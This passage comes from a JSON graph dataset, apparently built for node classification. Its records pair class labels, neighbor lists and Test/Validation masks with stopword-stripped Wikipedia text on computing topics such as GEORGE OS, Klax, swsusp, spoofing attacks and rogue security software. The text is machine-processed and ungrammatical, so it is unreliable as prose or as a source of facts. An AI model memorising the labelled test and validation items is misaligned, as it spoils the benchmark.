    "text": "Boxee_Box:boxee box boxee box d-link officially d-link boxee box dsm-380 linux-based set-top device media extender first began shipping 33 countries worldwide 10 november 2010 designed easily bring internet television video television via boxee software comes pre-installed boxee media center software hardware based intel ce4110 system-on-a-chip platform intel atom cpu powervr sgx535 integrated graphics processor ram nand flash memory dm-380 features hdmi port version 1.3 optical digital audio s/pdif rca connector analog stereo audio two usb ports sd card slot wired 100base-t ethernet built-in 2.4 ghz 802.11n wifi live tv dongle started shipping february 2012 enables users watch digital ota clear qam cable television channels epg boxee box also ships small two-sided rf remote control four-way d-pad navigation full qwerty keypad standard remote also sold separately usb receiver d-link boxee box remote dsm-22 used boxee installed computer one use remote without owning d-link boxee box look case remote prototypes boxee box designed san francisco-based astro studios designer xbox 360 microsoft zune 16 october 2012 boxee team announced intend discontinue distribution releasing additional major updates",
    "neighbors": [
      1700,
      1674,
      6058,
      5612,
      6380,
      6797,
      2383,
      1776,
      3664,
      7602,
      1107,
      7983,
      823,
      4219,
      8124
    ],
    "mask": "None"
  },
  {
    "node_id": 4148,
    "label": 2,
    "text": "Corbel_(typeface):corbel typeface corbel humanist sans-serif typeface designed jeremy tankard microsoft released 2005 part cleartype font collection suite fonts various designers released windows vista start letter c reflect designed work well microsoft cleartype text rendering system text rendering engine designed make text clearer read lcd monitors fonts group calibri cambria candara consolas constantia blurb use corbel described designed give uncluttered clean appearance screen letter forms open soft flowing curves legible clear small sizes larger sizes detailing style shapes apparent italic style true italic influences serif fonts calligraphy many letters gaining tail pointing right many aspects design similar calibri candara also humanist sans-serif designs like slightly condensed average font designer raph levien reviewing typographica described similar frutiger tankard described aims family design “ wanted move away round i-dot sans fonts 've seen lot recently less cuddly assertive wanted italic expressive sloped roman corbel default renders numbers text figures old style lowercase numerals preferred integrating figures running text uncommon choice sans-serif faces especially designed display screen several cleartype fonts also make default option lining figures suggested using opentype stylistic alternates menu text figures also found microsoft serif georgia typeface distributed microsoft excel viewer microsoft powerpoint viewer microsoft office compatibility pack microsoft windows open xml file format converter mac use operating systems gnu/linux cross-platform use web use available freeware licensed sold ascender",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      1098,
      4138,
      2221,
      4141,
      1487,
      6797,
      3538,
      4146,
      8374,
      9654,
      4127
    ],
    "mask": "Test"
  },
  {
    "node_id": 4149,
    "label": 7,
    "text": "List_of_cluster_management_software:list cluster management software list software cluster management",
    "neighbors": [
      11041,
      6615,
      1507,
      8194,
      6597,
      11428,
      4011,
      4463,
      6480,
      2834,
      3927,
      3323,
      2910
    ],
    "mask": "None"
  },
  {
    "node_id": 4150,
    "label": 2,
    "text": "Z-DOS:z-dos z-dos discontinued oem version microsoft ms-dos specifically adapted run hardware zenith z-100 personal computer z-100 used 8086-family microprocessor intel 8088 otherwise completely different internal architecture ibm pc time microsoft ms-dos n't specifically geared specific hardware platform could tailored run system long used 8086-compatible microprocessor situation completely like popular cp/m systems time typically used 8080-compatible 8080 8085 z80 among others microprocessor order achieve ms-dos like cp/m relied platform-specific dos- bios written target machine hardware-independent dos kernel could run beside ibm oem version ms-dos released pc dos dozens oem versions ms-dos geared specific non-ibm-compatible oem hardware—among zenith z-dos later almost 100 ibm-compatible clones became norm ms-dos became generic version could run generic version ms-dos however could run older non-ibm-compatible machines like z-100",
    "neighbors": [
      5067,
      1515,
      8301,
      9166,
      6129,
      499,
      9363,
      4409
    ],
    "mask": "Test"
  },
  {
    "node_id": 4151,
    "label": 2,
    "text": "GEORGE_(operating_system):george operating system george name given series operating systems released international computers tabulators ict 1960s ict 1900 series computers included george 1 george 2 george 3 george 4 initially 1900 series machines like ferranti-packard 6000 based ran simple operating system known executive allowed system operator load run programs teletype model 33 asr based system console december 1964 ict set operating systems branch develop new operating system 1906/7 branch initially staffed people released end work omp operating system ferranti orion initial design new system named george george e. felton head basic programming division based ideas orion spooling system atlas computer public claimed george stood general organisational environment contemporary sources say backronym july 1965 team ict present seminar npl describing ctss operating system developed mit project mac decided ict would need provide multi-access facilities known ict mop multiple online processing november 1965 h. p. goodman head operating systems branch attended fall joint computer conference las vegas plans multics initially described multics features discussed influenced future development george notably tree structured filestore towards end 1965 ict marketing requested simpler operating system made available quickly especially smaller members range decided two smaller systems known george 1 george 2 released rapidly larger operating system renamed george 3 george 1 simple batch processing system job descriptions read cards paper tape controlled loading running programs either loaded cards paper tape magnetic tape job control language allowed definition peripherals files used handling exception conditions job description would checked errors job run george used trusted program facilities provided executive run user programs george 2 added concept line peripheral handling spooling several different modules running parallel allowed overlapping input processing output operations installation large enough multiple copies central module could run allowing multiple jobs processed parallel george 2 job control language allowed use stored macros conditional facilities george 2 provided file system system user programs relied facilities provided executive files disk accessed unique 12 character names security erase bit provided minimop could run simultaneously george 2 machine provide on-line time-sharing facilities somewhat artificial example batch george 2 real application job would probably use stored macro much simpler example written longhand effort show features jcl george 3 main version operating system series larger machines 1900 series initially released 1906/7 eventually made available models 1902t contrast george 1 2 ran user-mode programs executive george 3 full operating system leaving low-level peripheral interrupt handling cut-down version executive george 3 implemented small memory-resident part collection chapters overlays loaded removed memory needed chapters strictly location-independent allowing best use memory internally george used cooperative multitasking context switches could take place chapter change call one chapter another specified places code user-level code run using preemptive multitasking context switches forced i/o operations clock ticks george written special assembler gin george input richer conditional compilation macro facilities standard plan assembler macros heavily used code reduce effort programming large system assembly language later versions macro features gin used add structured programming features code writing system estimated taken 75 programmer-years effort george 3 mixed batch online system jobs could run cards tape manner george 2 interactively mop multiple online processing terminals either simple teletype model 33 asr terminals block mode vdu terminals job control language terminals batch jobs included conditional operations macro operations contrast unix systems job control language part operating system rather user level shell process job could one program loaded memory time one job could start jobs run concurrently system resources site policy would permit system would swap user programs memory waiting input output activities required memory run george 3 provided tree structured file store inspired part multics every user system home directory many sub directories needed users home directory could accessed directly example directory user john could referred john full path example john computer science department home directory might manager.users.compsci.john access control lists used security user could permit deny user group users access files directories file data storage two-level files could either currently disk system low disk space could automatically relegated magnetic tape attempt made access currently line file job would suspended operators requested load appropriate tape tape made available file would brought back disk job resumed starting 1904a paging unit available larger 1900 processors george 4 written take advantage george 4 remained compatible george 3 common alternate george 3 4 machine filestore running george 3 day small interactive workloads george 4 night large memory intensive jobs george 4 introduced concept sparse program program addressing space larger allocated memory read-only pure data code regions new versions consolidator linker compilers provided use facilities source code george 3 4 conditional compilation facilities gin assembler used select version system compiled 1900 paging feature emulated 2900 series machines used later george installations george 4 fell use george 3 simple examples george use job modelled george 2 job like job somewhat artificial real use work would done pre-stored macro command job would read card paper tape reader minor changes removal first jb command could stored file run interactive mop terminal user input shown lower case output george upper case george distributed form allowed site modify large parts system compilation system started interrupted end dumped magnetic tape gin compiler allowed compilation continued point user site possibly modifying code already compiled versions george 3 release 8 provided binary form modifications needed system made binary patches simplify process george chapters included empty mend area end starting release 8 source george distributed binary magnetic tape microfiche system source level patches known mendits used modify system existing chapter could completely replaced new modified chapter george user group set mend exchange scheme share interesting modifications george modifications distributed freely others available fee icl produced new version george would sometimes include modifications produced users last released version 8.67 patches mend exchange scheme included standard george source switched conditional compilation turned part standard process tailoring george site george well documented internally series looseleaf folders distributed initial version plus amendments eventually original pages replaced new copy manuals consisted box empty looseleaf folders pile amendments first amendment list contributors technical reason amendment described keep everyone happy modified version george 3 supplied university manchester regional computer centre umrcc linked george 3 cdc cyber machine george supplied offline i/o job queueing functions online support supplied icl cyber hardware software cyber support team worked office name cybermen door release icl new range 2900 series vme operating system george became obsolete however due legacy investment software george icl released options run 1900 series software including george 2900 series machines initially direct machine environment dme later concurrent machine environment cme allowed simultaneous running 1900 2900 code system new versions george 3 continued released 2900 last version 8.67 released 1983 2005 least one site russia still running george 3 dme november 2014 george 3 run reconditioned icl 2966 national museum computing david holdsworth delwyn holroyd obtained copies george 3 issue tapes last live site uk british steel corporation decommissioned wrote emulator 1900 hardware executive allows running george microsoft windows linux part project computer conservation society emulator includes emulation executive java emulation icl7903 communications processor making possible run mop sessions telnetting case port 2023 tests emulator show george 3 y2k compliant",
    "neighbors": [
      2179,
      6664,
      3594,
      6797,
      10257,
      6675,
      406,
      7325,
      5293,
      7983,
      5936,
      8879,
      4151,
      823,
      1849,
      7483,
      11075,
      8262,
      1611,
      3916,
      5455,
      5840,
      477,
      5730,
      5363,
      5492,
      6772,
      9587,
      7032
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4152,
    "label": 3,
    "text": "Klax_(video_game):klax video game klax 1990 puzzle video game designed dave akers mark stephen pierce object line colored blocks rows similar colors make disappear object columns similar atari games originally released coin-op follow-up tetris tangled legal dispute time released summer 1990 also known last game released atari 2600 console discontinued early 1992 klax features conveyor belt top screen constantly rolls toward playing area delivering steady supply blocks player controls small device sits interface conveyor belt playing area moved left right catch blocks deposit either playing area hold 25 blocks 5x5 arrangement push back conveyor belt device hold five blocks uncaught block considered drop flashing block used wildcard colour playing area blocks eliminated arranging three color continuous line known klax line may horizontal vertical diagonal multiple grouping e.g. one vertical horizontal counts multiple klaxes klaxes four same-colored blocks two klaxes five same-colored blocks three klaxes goal reached bonus points awarded remaining blocks conveyor belt device empty spaces bin also levels certain point total required points excess required amount counted scoring bonus points klax consists 100 levels grouped blocks five beginning game fifth level levels divisible five except levels 95 100 player choose skip five ten levels skipping levels gives bonus points higher drop allowance game ends player either exhausts drop allowance fills playing area finishes level 100 akers programmed klax weeks using amigabasic ported line-by-line c. 1990 interview said wanted produce something playable compact relatively quick develop influences tetris tic-tac-toe chose name sound tiles make rolling across screen atari games released klax february 1990 soon called major arcade hit quickly released several home versions tengen brand akers created nintendo entertainment system genesis editions 16-bit conversions featured improved graphics klax received parents choice foundation seal approval 1990 best mind game 1991 european computer leisure awards dennis lynch chicago tribune named klax best cartridge 1990 midway games gained rights klax upon purchasing atari games 1996 title re-released retro compilations modern consoles 1999 press release called midway tic-tac tile puzzle game mike mika working game boy color version game placed hidden wedding proposal inside took girlfriend three years uncover proposal mike mika also placed hidden snake-like game well mini-adventure game within game easter eggs arcade version klax saw ports contemporary home computers video game systems 1990s including atari lynx amstrad gx4000 even atari 2600 final official atari-licensed release exclusively europe klax first game versions three 1990s leading consoles nintendo entertainment system genesis turbografx-16 klax included arcade party pak playstation game also reissued midway arcade treasures 2003 compilation nintendo gamecube playstation 2 xbox pc also appeared lego dimensions release famicom tsūshin awarded pc engine version game 30 40 game ranked 26th best game time amiga power 1991 2012 author named kieren hawken described klax one coveted video games time capsule review lynx version start clayton walnum commented start playing klax maniac uzi wo n't able tear away graphics clean vivid music darn near good enough dance digitized sound effects speech astonishing small unit julian rignall reviewed atari lynx version cvg magazine january 1991 quoting game simple addictive giving rating 93 100",
    "neighbors": [
      3233,
      8484,
      7269,
      10855,
      10316,
      1776,
      9951,
      4856,
      986,
      9627,
      2045,
      95
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4153,
    "label": 2,
    "text": "PelicanHPC:pelicanhpc pelicanhpc operating system based debian live provides rapid means setting high performance computer cluster pelicanhpc formerly known parallelknoppix",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      330,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 4154,
    "label": 4,
    "text": "Redo_Backup_and_Recovery:redo backup recovery redo backup recovery free backup disaster recovery software runs bootable linux cd image presently ubuntu 12.04 lts features gui front end partclone command line utility capable bare-metal backup recovery disk partitions use external hard drives network shares addition backup software disk includes additional supporting programs",
    "neighbors": [
      7905,
      6280,
      1801,
      492,
      7087,
      7983,
      6514,
      823,
      8254,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 4155,
    "label": 1,
    "text": "Component-oriented_database:component-oriented database component-oriented database codb way data administration programming dbms using paradigm component-orientation paradigm component-orientation co development object-orientation oo programming data modeling leading toward extreme possibilities reuse model type classes aggregate cells called components execute role similar function structured programming way processing information contemporary relational database model component-orientation mixes set features predecessor models understanding simpler thinking visual component application deployed executable bytecode otherwise turned linked icon inside another application icon one clicks implements certain tasks concepts extended non-visual components database activities component visual aggragate classes sense oo linked ones adapters oo model conception data code programming code mixed cohesive body difficulties conceiving codb co programming separate one although enigma important conceptual epistemological area practical data processing n't importance question usage mapping models large scale used software like mappings called ordbms crdb component-relational database separation data code still well defined programming activity co often taken place large-scale used oo languages like c++ java mapping adaptation designing paradigm supored uml data modeling data administration database administration mapping adaptation alike ordbms paradigm adapted paradigm component-based models known component-relational database crdb main advantage component-oriented thinking seen early chapters optimization reusability work going far away uses oo models co paradigm allows use ready use applications modules new bigger projects necessary regard technical features achieved traditional oo models although idea component came naturally oo thinking basis support notions oo like encapsulation inheritance polymorphism necessarily leads idea reusing applications modules new works co thinking also assures components fully tested real application thus model paroxism reuse well feature understanability end users corollary app- comp way realizing works even using software present oo paradigm many specific consequences world data-oriented activities analogous way whole models composed classes treated part component new comprehensive model",
    "neighbors": [
      2688,
      5632,
      8201,
      9108,
      9631,
      1697,
      5677,
      9397,
      11574,
      9147,
      7868,
      11324,
      11457,
      6085,
      9286,
      2512,
      7767,
      7650,
      8291,
      9828,
      10471,
      6383,
      1146,
      6395,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 4156,
    "label": 3,
    "text": "Hybrid-core_computing:hybrid-core computing hybrid-core computing technique extending commodity instruction set architecture e.g x86 application-specific instructions accelerate application performance form heterogeneous computing wherein asymmetric computational units coexist commodity processor hybrid-core processing differs general heterogeneous computing computational units share common logical address space executable composed single instruction stream—in essence contemporary coprocessor instruction set hybrid-core computing system contains instructions dispatched either host instruction set application-specific hardware typically hybrid-core computing best deployed predominance computational cycles spent identifiable kernels often seen high-performance computing applications acceleration especially pronounced kernel ’ logic maps poorly sequence commodity processor instructions and/or maps well application-specific hardware hybrid-core computing used accelerate applications beyond currently physically possible off-the-shelf processors lower power cooling costs data center reducing computational footprint i.e. circumvent obstacles power/density challenges faced today commodity processors",
    "neighbors": [
      499,
      6268,
      5358,
      6415
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4157,
    "label": 4,
    "text": "Optenet:optenet optenet global security company provides customers multi-tenant secure web gateway e-mail infrastructure solution primarily carriers managed security service providers mssps large enterprises optenet private company spin-off university navarra engineering faculty san sebastian research centre san sebastian spain provides customers multi-tenant secure web gateway e-mail infrastructure solution primarily carriers managed security service providers mssps large enterprises want create service offerings clients product optenet websecure recently awarded five stars sc magazine ’ web content management group test defining 'solid web security solution optenet named cool vendor gartner innovative multi-tenant technology 2011 gartner report cool vendors communications service provider infrastructure 2011 authored akshay sharma deborah kish",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4158,
    "label": 5,
    "text": "Semaphore_Flag_Signaling_System:semaphore flag signaling system computer networking semaphore flag signaling system sfss humorous proposal carry internet protocol ip traffic semaphores semaphore flag signaling system initially described rfc 4824 april fools rfc issued internet engineering task force edited j. hofmueller et al released april fool day 2007 one several april 1 rfcs reference implementation ip sfs done authors rfc within project talking fish email transmitted using smtp semaphore flag signals",
    "neighbors": [
      3592,
      3218,
      11413,
      3742,
      10924,
      6319,
      562,
      6456,
      4797,
      3006,
      64,
      7364,
      2887,
      5469,
      5470,
      5472,
      10341,
      10344,
      11112,
      5102,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 4159,
    "label": 4,
    "text": "Optiv_(cybersecurity_company):optiv cybersecurity company optiv security inc. optiv privately owned information security company based denver colorado november 5 2014 security firms accuvant fishnet security announced would join forces create new company merger would create roughly 1.5 billion information security giant solutions covering nearly every aspect cyberdefense merger completed february 2 2015 company announced previously announced transaction closed new company owned primarily blackstone group private equity firm acquired majority stake accuvant march 2014 april 21 2015 accuvant fishnet security announced plans launch new combined corporate name brand begin conducting business optiv security summer 2015 black hat usa 2015 conference two companies announced completed merger subsequently conducting business optiv security company also launched new brand conference february 1 2017 optiv announced acquired global investment firm kkr mid-2018 optiv moved headquarters newly constructed 40-story 1144 fifteenth tower downtown denver considered primary tenant building",
    "neighbors": [
      2275,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 4160,
    "label": 9,
    "text": "UBASIC:ubasic ubasic freeware public domain software without source code basic interpreter written yuji kida rikkyo university japan specialized mathematical computing ubasic ready-to-run language need set another advanced language common problem multi-digit math languages runs dos dos box dos shell microsoft windows etc specialized number theory primality testing factoring large integers 2600 digits implementation basic makes easy read programs without extensive study basic language structure syntax close ordinary algebra help files articles lessons beginners ubasic built-in on-line editor several aids debugging show cross references calling lines lines containing variable lists variables/arrays renumber lines change variable names append additional programs trace single step time milliseconds help determine fastest way highly repetitive sections redefine function keys either provide easy one-keypress function prevent standard function accidentally used n't shell dos execute dos command convert single-byte character set double-byte character set much use host computer would likely need aware operating system documents may added modified ubhelp.hlp primality testing aprt-cle 884 digits best run ubasic version 8.8f later 500 digits said take 5 hours pp-200 150 digits takes 16 minutes 486-100 2¼ minutes k6 233 250 digits takes 13½ minutes k6 233 recent machines 10 times faster aprt-cle often algorithm choice testing primality integers within range factoring programs ecmx quite fast find factors number digits low-20s fairly easily mid-20s somewhat less easily upper-20s lower chance success found 30-digit factor finding factors elliptic curve method always chancy larger factors greater number curves tested greater chances success number needed average one sometimes get lucky unlucky increases rapidly size factors always best use fastest machine available ecmx uses accepted standards limits stop working one curve switch next preliminary primality testing finding small factors powers interpreted allows modifying programs restarting using goto middle run even multi-day without losing accumulated data stopping recommended unless program saving data safely somewhere users forgot write way save data quitting perhaps expect find trying prove anything might lose valuable data need something else time freeze current program file later melt long lower memory configuration ubasic line numbers use indentation control structure subroutines user functions passed parameters local variables parameters passed value name user functions subroutines may passed parameters limited labels various options conditional functions users indent much needed much structure wanted spaghetti code mistake consider ubasic modern might inferred reader articles confuse indentation structure n't favor line numbers line numbers allows easy jumping intermediate point routine sometimes save duplicating lines ubasic version 8 high-precision real complex arithmetic 2600 digits prior versions adds exact rational arithmetic arithmetic single-variable polynomials complex rational modulo p coefficients well string handling limited list handling abilities also context-sensitive on-line documentation read ubhelp.doc information file uses ascii printed paper document 2005 help file many errors ten-year project rewrite/correct nearly ready publication probably late summer 2005 new help file new extension '.hlp eventually package name u3d748f* list updates available many changes remain unreported version 8.8 different precision 8.74 still commands documentation new command version 8.8c polyconv converts polynomials modulus=0 modulus=prime formatting specifications warning never test anything important might running suspended somewhere else lockups may expected particularly keyscan see freeze roll melt similar warning ubasic several types arrays logical operators bit operators 4 standard loop structures combined operators call machine language routines increased speed ecmx must know assembly language even understand instructions able write tsr debug enough ubasic used process almost kind data example .wav files process text files convert tabs spaces spaces tabs programs generate tabs actually choke early 2005 internet search turned versions 8.74 32 8.74 16 8.71 4000 16 9.0ze 9.0zc 9.0e 8.8f 32 8.8f 16 8.8f c 8.7e 32 8.7e 16 8.30 32 8.30 16 7.25 32 7.25 16 8.8a 32 8,8a 16 8.8a c 8.8c 32 8.8c 16 8.8c c 8.8e 32 8.8e 16 8.8e c 12 versions 52 known numbers many directly identified 16 32 refer number bits multiplication engine 4000 refers special versions go 4000 digits users may need one generate first 792 bernoulli numbers double index 1584 latest version get 540/1080 c cga machines versions italics recommended users would need 8.8f already using version later 8.74 especially using version later 8.7e strongly advised switch latest version 8.8f programs fancy display example written 8.74 may work 8.8f without considerable rewriting latest versions strip carriage returns/line feeds ascii files programs ubh even one 8.8f need added lines strip program written one version used another version without checking certain programs nfs run experimental version 9.** ppmpx36e version multi-polynomial quadratic sieve needs 8.8f windows versions ubasic came defective ubconst7.dat file check one supplied 8.8f identical switch obtaining latest version ubasic see external links sections many internet math pages language/packages sites following short simple program partition count function although n't many fancier structures real program invented article modern fast athlon calculate partition counts p 0 p 1000 ½ second contrast ½ century first time save result file uncomment line 40 remove leading apostrophe working continued fractions number terms limited available accuracy size term approximate formula 2 decimal fraction digit accuracy term times base ten logarithm term way work safely twice parallel initial input one dithered final several digits least 1 word two calculations give identical terms stop previous term ubasic calculate partition function p 1330521 8.74 p 1361911 4000 digit versions get many essential features consists following",
    "neighbors": [
      3718,
      7691,
      1805,
      6797,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      2843,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      315,
      7355,
      7486,
      7870,
      4674,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      9714,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4161,
    "label": 2,
    "text": "Swsusp:swsusp swsusp software suspend kernel feature/program part power management framework linux kernel default suspend framework kernel 3.8 swsusp helps drive system low power state called suspend actively used providing ability return state suspend called resume restore 3.8 swsusp provides following options suspend details swsusp refer kernel documentation documentation/power/swsusp.txt enable swsusp following selected kernel configuration /dev/resume_partition needs replaced actual swap partition used suspending otherwise resume=/dev/resume_partition given parameter system bootup actual suspend done may check suspend options available cat /sys/power/state depending kernel config show something similar standby mem disk options available disk viewed cat /sys/power/disk depending kernel config show something similar platform shutdown reboot swsusp lacks compression graphical progress indication provided uswsusp",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      6180,
      3109,
      8242,
      9266,
      6213,
      8268,
      5222,
      10856,
      4207,
      4734,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      11539,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4162,
    "label": 2,
    "text": "Desktop_Cleanup_Wizard:desktop cleanup wizard desktop cleanup wizard component included microsoft windows xp operating system aims reduce clutter user desktop environment moving unused shortcuts separate directory called unused desktop shortcuts run shows list shortcuts user select shortcuts move unused desktop shortcuts directory desktop cleanup wizard works scheduled task runs day wizard run 60 days wizard displayed user desktop cleanup wizard also accessible desktop context menu arrange icons sub-menu desktop cleanup wizard scheduled task enabled disabled desktop items configuration screen available desktop tab display properties dialog box windows xp successor windows vista include desktop cleanup wizard windows 7 function integrated system maintenance wizard troubleshooting control panel",
    "neighbors": [
      8080,
      5225,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 4163,
    "label": 4,
    "text": "Spoofing_attack:spoofing attack context information security especially network security spoofing attack situation person program successfully masquerades another falsifying data gain illegitimate advantage many protocols tcp/ip suite provide mechanisms authenticating source destination message thus vulnerable spoofing attacks extra precautions taken applications verify identity sending receiving host ip spoofing arp spoofing particular may used leverage man-in-the-middle attacks hosts computer network spoofing attacks take advantage tcp/ip suite protocols may mitigated use firewalls capable deep packet inspection taking measures verify identity sender recipient message websites especially pornographic paysites allow access materials certain approved login- pages enforced checking referrer header http request referrer header however changed known referrer spoofing ref-tar spoofing allowing users gain unauthorized access materials spoofing also refer copyright holders placing distorted unlistenable versions works file-sharing networks public telephone networks often provide caller id information includes caller number sometimes caller ’ name call however technologies especially voice ip voip networks allow callers forge caller id information present false names numbers gateways networks allow spoofing public networks forward false information since spoofed calls originate countries laws receiver country may apply caller limits laws effectiveness use spoofed caller id information scam sender information shown e-mails codice_1 field spoofed easily technique commonly used spammers hide origin e-mails leads problems misdirected bounces i.e e-mail spam backscatter e-mail address spoofing done quite way writing forged return address using snail mail long letter fits protocol i.e stamp postal code smtp protocol send message done using mail server telnet geolocation spoofing occurs user applies technologies make appear located somewhere actually located common geolocation spoofing use virtual private network vpn dns proxy order user appear located different country state territory actually located according study globalwebindex 49 global vpn users utilize vpns primarily access territorially restricted entertainment content type geolocation spoofing also referred geo-piracy since user illicitly accessing copyrighted materials via geolocation spoofing technology another example geolocation spoofing occurred online poker player california used geolocation spoofing techniques play online poker new jersey contravention california new jersey state law forensic geolocation evidence proved geolocation spoofing player forfeited 90,000 winnings gps spoofing attack attempts deceive gps receiver broadcasting incorrect gps signals structured resemble set normal gps signals rebroadcasting genuine signals captured elsewhere different time spoofed signals may modified way cause receiver estimate position somewhere actually located different time determined attacker one common form gps spoofing attack commonly termed carry-off attack begins broadcasting signals synchronized genuine signals observed target receiver power counterfeit signals gradually increased drawn away genuine signals suggested capture lockheed rq-170 drone aircraft northeastern iran december 2011 result attack gps spoofing attacks predicted discussed gps community previously known example malicious spoofing attack yet confirmed proof-of-concept attack successfully performed june 2013 luxury yacht white rose drachs misdirected spoofed gps signals group aerospace engineering students cockrell school engineering university texas austin students aboard yacht allowing spoofing equipment gradually overpower signal strengths actual gps constellation satellites altering course yacht june 2017 approximately twenty ships black sea complained gps anomalies showing vessels transpositioned miles actual location professor todd humphreys believed likely spoofing attack gps anomalies around putin palace moscow kremlin led researchers believe russian authorities use gps spoofing wherever vladimir putin located affecting maritime traffic since advent software defined radio gps simulator applications made available general public made gps spoofing much accessible meaning performed limited expense modicum technical knowledge different ways prevent gps spoofing department homeland security collaboration national cybersecurity communications integration center nccic national coordinating center communications ncc released paper lists methods prevent type spoofing important recommended use installation operation strategies development opportunities described herein significantly enhance ability gnss receivers associated equipment defend range interference jamming spoofing attacks",
    "neighbors": [
      513,
      2947,
      7044,
      262,
      138,
      8202,
      10378,
      13,
      8333,
      3473,
      4863,
      5373,
      794,
      11170,
      8998,
      3495,
      10790,
      939,
      11052,
      6013,
      1070,
      10417,
      9909,
      953,
      5433,
      62,
      7102,
      2240,
      4032,
      6466,
      9024,
      7364,
      10309,
      2558,
      9160,
      4689,
      4945,
      8667,
      4956,
      7644,
      10332,
      10466,
      483,
      612,
      4453,
      5608,
      11112,
      6762,
      1899,
      1139,
      5621,
      6261,
      8694,
      8950,
      5245,
      2430,
      895
    ],
    "mask": "Test"
  },
  {
    "node_id": 4164,
    "label": 3,
    "text": "180_(video_game):180 video game 180 darts video game released zx spectrum commodore 64 amstrad cpc atari 8-bit family msx player competes 501 darts darts players waiting championship tournament normal darts rules applying subtracting score 501 zero whilst finishing double beginning quarter finals player must win best three match advance tournament win another match semi final stage advance final face world champion jammy jim final match however player needs win one leg win tournament players also compete another human player play round clock throwing darts around dartboard 20 1 within time limit total eight computer-controlled opponents game start match computer randomly selects opponent though jammy jim played final opponents del boy desmond sure shot sidney devious dave limp wrist larry beer belly bill mega mick tactical tel jammy jim time release ratings game favourable spectrum version got 72 rating crash magazine labelled best darts game ever commodore 64 version received 70 rating zzap magazine amstrad version got rating 67 amstrad action game reviewed sinclair user rated game 5 5 stating darts ought boring tedious 180 made funny exciting impressive closet hit game reviewed sinclair rated game 9 10 stating presentation 180 veer toward macho crafty cockney bristow school darts rather gentleman john lowe otherwise little quibble winner across board game reviewed ace stating definitive computer darts game must play arrows micro one get",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4165,
    "label": 4,
    "text": "Rogue_security_software:rogue security software rogue security software form malicious software internet fraud misleads users believing virus computer pay money fake malware removal tool actually introduces malware computer form scareware manipulates users fear form ransomware rogue security software serious security threat desktop computing since 2008 two earliest examples gain infamy addestroyer virtualbouncer often bundled back 2004 rogue security software mainly relies social engineering fraud defeat security built modern operating system browser software install onto victims computers website may example display fictitious warning dialog stating someone machine infected computer virus encourage manipulation install purchase scareware belief purchasing genuine antivirus software trojan horse component users misled installing trojan may disguised rogue security software however propagate onto users computers drive-by downloads exploit security vulnerabilities web browsers pdf viewers email clients install without manual interaction recently malware distributors utilizing seo poisoning techniques pushing infected urls top search engine results recent news events people looking articles events search engine may encounter results upon clicked instead redirected series sites arriving landing page says machine infected pushes download trial rogue program 2010 study google found 11,000 domains hosting fake anti-virus software accounting 50 malware delivered via internet advertising cold-calling also become vector distribution type malware callers often claiming microsoft support another legitimate organization black hat search engine optimization seo technique used trick search engines displaying malicious urls search results malicious webpages filled popular keywords order achieve higher ranking search results end user searches web one infected webpages returned usually popular keywords services google trends used generate webpages via php scripts placed compromised website php scripts monitor search engine crawlers feed specially crafted webpages listed search results user searches keyword images clicks malicious link redirected rogue security software payload websites usually employ third-party services advertising webpages one advertising services compromised may end inadvertently infecting websites using service advertising rogue security software spam messages include malicious attachments links binaries drive-by download sites another common mechanism distributing rogue security software spam emails often sent content associated typical day-to-day activities parcel deliveries taxation documents designed entice users click links run attachments users succumb kinds social engineering tricks quickly infected either directly via attachment indirectly via malicious website known drive-by download usually drive-by download attacks malware installed victim machine without interaction awareness occurs simply visiting website desktop pop-ups pop-under longer regular feature operating systems computer attacked popups appears even user active computer definite red flag installed rogue security software may attempt entice user purchasing service additional software developers rogue security software may also entice people purchasing product claiming give portion sales charitable cause rogue green antivirus example claims donate 2 environmental care program sale made rogue security software overlaps function scareware also sanction ftc increasing effectiveness anti-malware tools since 2006 made difficult spyware adware distribution networks—already complex begin with—to operate profitably malware vendors turned instead simpler profitable business model rogue security software targeted directly users desktop computers rogue security software often distributed highly lucrative affiliate networks affiliates supplied trojan kits software paid fee every successful installation commission resulting purchases affiliates become responsible setting infection vectors distribution infrastructure software investigation security researchers antivirus xp 2008 rogue security software found affiliate network members grossing commissions upwards usd150,000 10 days tens thousands successful installations law enforcement legislation countries slow react appearance rogue security software even though simply uses new technical means 